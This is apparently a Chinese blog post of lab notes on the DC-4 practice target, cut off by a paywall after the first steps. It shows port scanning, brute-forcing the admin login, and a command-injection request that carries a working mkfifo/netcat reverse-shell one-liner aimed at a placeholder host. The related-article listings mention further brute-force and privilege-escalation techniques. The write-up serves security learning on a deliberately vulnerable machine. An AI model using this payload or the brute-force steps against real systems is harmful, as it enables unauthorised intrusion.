DC-4靶机学习笔记

最新推荐文章于 2023-09-20 17:03:14 发布
最新推荐文章于 2023-09-20 17:03:14 发布
阅读量439 收藏
点赞数
分类专栏: DC靶场 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43598634/article/details/126567758
版权

DC-4靶机

flag

1、获取靶机的IP地址

使用nmap或者goby进行扫描,确定靶机IP,然后扫描靶机开放的端口和服务。

在这里插入图片描述

目标主机开放了22和80端口。

2、访问80端口

看到登录界面

在这里插入图片描述

看到这个很明显的想到了爆破,用户名应该就是admin,只需要爆破密码。

使用bp抓包并进行爆破。

在这里插入图片描述

成功得到用户名和密码 admin happy

3、使用爆破得到的用户名和密码进行登录

登陆后发现会有命令执行,直接进行反弹shell

在这里插入图片描述

radio=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>%261 | nc IP 1234 > /tmp/f;&submit=Run

最低0.47元/天 解锁文章
浅时光-_-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC-1靶机渗透
weixin_62485906的博客
06-23 1297
关于kali渗透DC-1靶机
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4064
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
DC靶机系列:DC-1
Ays.Ie的博客
02-22 606
本篇文章为DC系列第一个靶机,后续会持续更新DC系列其他靶机的渗透过程及思路,也会更新其他靶场的渗透内容,希望能够帮助有需要的同学
找不到靶机IP怎么办,教你几步就会了
热门推荐
qq_20765511的博客
02-23 1万+
家人们最近从老家回来正在找工作,没时间,现在才开始写笔记 之前我学渗透的时候看着看着后面很简单,但是第一步就没了,找不到IP地址,这就很烦了,然后我在网上找,什么进入管理者界面修改啊什么的,但是我照着做了一遍,就是不知道IP是什么,不需要搞那些花里胡哨的东西 我教你个很简单的方法 我这个靶机是找朋友要的,所以我不知道IP地址,我看他们都是开机就会直接显示IP地址没有,我得自己找 一般来说靶机通常不会太大,通常是用 VirtualBox 这个虚拟机 打开来就是这样 你只需要在虚拟机VirtualBox 靶机
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1311
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
最新发布
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Os-Hax靶机测试
weixin_58729813的博客
04-08 260
本文是针对vulnhub靶机测试,拿到两个flag即可
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 684
Pinkys-Place
DC-4靶机渗透
weixin_45349299的博客
12-21 985
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
对DriftingBlues-2靶机进行渗透测试
zll___的博客
04-01 210
对DriftingBlues-2靶机进行渗透测试
靶机无法自己获取ip地址解决办法
qq_44005305的博客
08-07 245
点击重启机器,在重启时不断的按键盘上的向上的方向键,调出启动菜单(可能要尝试很多次)按e进入内核加载的配置行将其修改为单用户模式修改前修改后按住ctrl+x进入单用户模式输入ip a,查看当前网卡信息我这里是/etc/network/interfaces进入之后提示我ifipdown已经被netplan(5)代替了,让我去/etc/netplan下找配置文件发现网卡名称不正确,修改为正确的就行重启计算机正常进入系统。重启计算机正常进入系统。
win11配置了hosts文件但是仍然无法打开dc-2 dc-6等靶机ip地址的解决办法
Aiyflwoers的博客
08-07 1306
我在做入侵dc-2时候发现配置了hosts文件依旧无法打开靶机指定的ip。而我在虚拟机里配置了hosts文件却可以打开。我于是就直接用linux的firefox去解题了,后来在做dc-6入侵时感觉很不爽没有我提前安好的插件,而且一直疑惑不解决也不是个道理,也怕万一以后有人遇到了同样的问题问我,我该怎么解决?于是下定决心解决这个问题。首先我用主机ping了靶机,发现ping不通。我此时意识到应该是网络适配器的问题,我分别检查了win11的网络适配器和虚拟机的虚拟网络网络适配器,发现了问题! win11的网络适
靶机5 DC-4(过程超详细)
honest_gg的博客
09-26 1575
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC-4靶机
weixin_50815573的博客
03-08 5630
一、DC-4的信息收集 1.确定IP,端口号; 命令:nmap -sP 192.168.159.0/24 探测到主机的ip为192.168.1.165,下一步进行端口判断; 命令:nmap -A -p- -T4 192.168.1.165 查看源码,我们可以收集到以下信息: 1.页面通过post提交 2.用户名的由username接收 3.密码由password接收 4.表单信息提交到login.php页面进行登陆判断 二、通过暴力破解密码,成功登陆 1.确定密码字典,.
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值